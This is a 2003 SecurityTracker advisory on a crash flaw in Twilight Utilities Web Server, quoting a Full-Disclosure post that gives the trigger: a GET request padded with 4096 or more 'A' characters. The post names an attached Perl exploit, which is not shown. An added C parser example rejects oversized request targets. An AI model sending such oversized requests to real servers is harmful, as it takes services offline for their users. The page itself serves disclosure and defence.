SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Twilight Utilities Web Server
Vendors:   Twilight Utilities
Twilight Utilities Web Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006582
SecurityTracker URL:  http://securitytracker.com/id/1006582
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 16 2003
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in the Twilight Utilities Web Server. A remote user can cause the web server to crash.

Security-Protocols Research Labs reported that a remote user can send a specially crafted HTTP GET request to cause the web service to crash. According to the report, a GET / followed with 4096 characters can trigger the flaw.

A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can cause the web service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.twilightutilities.com/WebServer.html
Cause:   Boundary error
Underlying OS:  Windows (Any)
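
The entry gives the cause as a boundary error reached through an over-long GET target. As an added example (not the vendor's code and not part of the advisory), this C request-line parser checks the target length before copying and returns 414 for oversized input; `parse_request_line`, `status_for_padded_get` and the `MAX_TARGET` limit are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 1024   /* assumed limit for this example, not a vendor value */

/* Parse "GET <target> HTTP/1.x" from `len` received bytes (not NUL-terminated).
 * Returns 200 and fills `target`, 414 if the target cannot fit in `cap`
 * bytes, or 400 if malformed. Never writes past target[cap - 1]. */
int parse_request_line(const char *buf, size_t len, char *target, size_t cap)
{
    static const char method[] = "GET ", version[] = " HTTP/1.";
    const size_t mlen = sizeof method - 1, vlen = sizeof version - 1;
    size_t end, tlen;

    if (cap == 0) return 400;
    target[0] = '\0';
    if (len <= mlen || memcmp(buf, method, mlen) != 0 || buf[mlen] != '/')
        return 400;
    /* Scan only the bytes actually received; stop at the first delimiter. */
    for (end = mlen; end < len; end++)
        if (buf[end] == ' ' || buf[end] == '\r' || buf[end] == '\n') break;
    tlen = end - mlen;
    if (tlen >= cap) return 414;            /* length is checked before any copy */
    if (len - end < vlen || memcmp(buf + end, version, vlen) != 0)
        return 400;                         /* truncated line or missing version */
    memcpy(target, buf + mlen, tlen);
    target[tlen] = '\0';
    return 200;
}

/* Constructed input: "GET /" followed by `pad` filler bytes, parsed in memory. */
int status_for_padded_get(size_t pad)
{
    static char req[8192];
    char target[MAX_TARGET];
    size_t n = 5;
    if (pad > sizeof req - 32) return -1;
    memcpy(req, "GET /", 5);
    memset(req + n, 'A', pad); n += pad;
    memcpy(req + n, " HTTP/1.0\r\n", 11); n += 11;
    return parse_request_line(req, n, target, sizeof target);
}

int main(void)
{
    printf("short target: %d\n", status_for_padded_get(10));
    printf("4096-byte target: %d\n", status_for_padded_get(4096));
    return 0;
}
```

A real server would read more data on an incomplete line rather than return 400 immediately, while still refusing once the bytes buffered so far exceed the limit.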

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 14 2003 (Vendor Issues Fix) Re: Twilight Utilities Web Server Can Be Crashed By Remote Users
The vendor has issued a fix.
Jul 14 2003 (More Information is Available) Re: Twilight Utilities Web Server Can Be Crashed By Remote Users
Another exploit is available; also, the vendor has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] Twilight Utilities TW-WebServer/1, 3, 2, 0 DoS


SP Research Labs Advisory x02
-----------------------------
www.security-protocols.com

Product - Twilight Utilities TW-WebServer/1,3,2,0

Download it here:
http://www.twilightutilities.com/WebServer.html

Date Released - 04/15/2003

Release Mode - 0hday, why contact the vendor?

Advisory Link:
http://www.security-protocols.com/article.php?sid=1474&mode=thread&order=0

----------------------------

Product Description from the vendor -

We are excited to present this completely new Modem Ready Internet Web
Server supporting these terrific features.

-Installs in seconds
-Lets you INSTANTLY share pictures and files
-Modem aware
-Automates telling friends and family when you start serving
-Automatically integrates your web camera
-Allows others to send files to you
-Automatically generates web pages
-Supports file resume
-A truly unique files-sharing tool

-----------------------------

Vulnerability Description -

To exploit this vulnerability, simply do a GET / with 4096 A's or more; this
will cause the webserver to go down.  Who really gives a damn, right?

Tested on:

Windows XP Pro SP1
Windows 2000 SP3
-----------------------------


2PAC and Snoop Dogg did most of the work on this one.

-----------------------------

peace out,

badpack3t
www.security-protocols.com



[Attachment: sp-urfuqed.pl (application/x-perl)]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 



Copyright 2021, SecurityGlobal.net LLC